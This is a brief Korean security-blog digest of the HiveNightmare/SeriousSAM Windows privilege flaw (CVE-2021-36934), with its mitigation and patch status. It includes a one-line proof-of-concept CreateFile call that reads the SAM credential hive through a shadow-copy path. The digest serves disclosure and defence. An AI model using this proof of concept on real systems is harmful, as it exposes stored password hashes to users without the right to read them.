[하루한줄] HiveNightmare aka SeriousSAM — anybody can read the registry in Windows 10 - hackyboiz

URL

• https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5

Target

• Windows

Explain

Windows에서 Shadow Volume이 활성화되어 있을 때, Shadow Copy을 통해 일반 유저 권한에서 읽지 못하는 레지스트리를 읽을 수 있는 취약점이 발견되었습니다.

POC는 다음과 같습니다.

hFile = CreateFile(TEXT(“\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy1\\\\Windows\\\\System32\\\\config\\\\SAM”),GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

이 취약점의 정확한 원인은 분석되고 않았지만 SAM 파일에 있는 BUILTIN\Users의 읽기 권한을 뺌으로써 취약점이 활용되는 것을 막을 수 있습니다. 현재 이 취약점은 패치되지 않았으며 CVE-2021-36934를 할당 받고 패치 진행 중에 있습니다.